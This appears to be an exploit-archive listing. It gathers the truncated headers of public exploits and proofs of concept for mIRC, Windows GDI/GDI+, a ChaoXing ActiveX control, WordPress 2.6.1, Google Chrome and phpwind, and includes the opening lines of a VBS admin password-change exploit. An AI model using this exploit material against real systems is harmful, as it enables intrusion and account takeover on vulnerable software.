#!/usr/bin/perl
#
#
# mIRC 6.34 Remote Buffer Overflow Exploit
# Exploit by SkD (skdrat <at> hotmail <.> com)
# ----------------------------------------
# A day's work of debugging and looking at mIRC.
#
# Tested on Windows XP SP3 English and Windows Vista SP0.
#
# Credits to securfrog for publishing the PoC.
#
# Author has no responsibility over the damage you do with this!
#
# Note: You might change the addresses for Vista ;)
#
# ----------------------------------------
Tags: Exploit, mIRC

EMR_COLORMATCHTOTARGETW stack buffer overflow exploit
By Ac!dDrop
This is one of the two vulnerabilities of MS08-021.
Tested on Windows XP Professional SP1:
GDI32.dll    5.1.2600.1106
kernel32.dll 5.1.2600.1106
ws2_32.dll   5.1.2600.0
Tags: Exploit, GDI+, MS08-021

MS Windows GDI+ .ico Remote Division By Zero
Application: GDIPLUS.DLL
Web Site: http://www.microsoft.com/
Platform: Windows *
Bug: Division By Zero
Tested against: XP SP3 fully patched
Note: This has nothing to do with http://milw0rm.com/exploits/4044
-------------------------------------------------------
Tags: Exploit, GDI+, GdiPlus.dll

Author: friddy
Source: EvilOctal Security Team (www.eviloctal.com)
Note: This article was first published on Friddy's blog and later submitted by the original author to the EvilOctal Security Team discussion group; please credit the original site when reposting.
This article only contains a proof that the vulnerability exists; its effect is to launch the calculator program, and it contains no attack code!
The vulnerability disclosed last November was in target.Register(ok, buffer); this time the buffer overflow is in target.LoadPage(buffer, 1, 1, 1).
Vulnerability location: a buffer overflow occurs in the LoadPage function of clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2
Crash report: ACCESS_VIOLATION
Disasm: 41414141    ?????    ()
Tags: 0day, Exploit, 超星

#!/usr/bin/php
<?php
# ------------------------------------------------------------
# quick'n'dirty wordpress admin-take0ver poc
# by iso^kpsbr in august 2oo8
#
# works w/ wordpress 2.6.1
#
#         .oO( private — do not spread! )Oo.
#
# you'll have to make sure you run roughly the same
# php version as on the server, that is: if server
# is >=5.2.1 you'll need to be as well, in case
# server is <5.2.1, your php also needs to be below.
# to make sure it works you'll need the exact same version!
# also, mod_php works better than (f)cgi..
# (this is a first working version - not a very reliable one)
Tags: Exploit, SQL Column Truncation, WordPress

PoC code is in the attached file, because the file is saved in 'Unicode' encoding for the exploit.
Here is the description for this vulnerability:
· Type of Issue: Buffer Overflow.
· Affected Software: Google Chrome 0.2.149.27.
· Exploitation Environment: Google Chrome (Language: Vietnamese) on Windows XP SP2.
· Impact: Remote code execution.
· Rating: Critical.
· Description:
Tags: Exploit, Google Chrome

Author: nerex
E-mail: nerex[at]live[dot]com
Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically downloaded to the user's computer without any user prompt.
This proof-of-concept was created for educational purposes only.
Use the code at your own risk.
The author will not be responsible for any damages.
Tags: Exploit, Google Chrome

Author: Tr4c3
' phpwind arbitrary admin password change vulnerability, VBS version of the exploit, by Tr4c3
Dim strUrl, strPost, xPost, strGet
Set Args = Wscript.Arguments
If Args.Count <> 2 Then
    Wscript.Echo "Usage: " & Wscript.ScriptName & " http://hi.baidu.com/tr4c3/ 1"
    Wscript.Quit
Else
    strUrl = Args(0) & "wap/index.php"
Tags: Exploit, PHPWind, VBS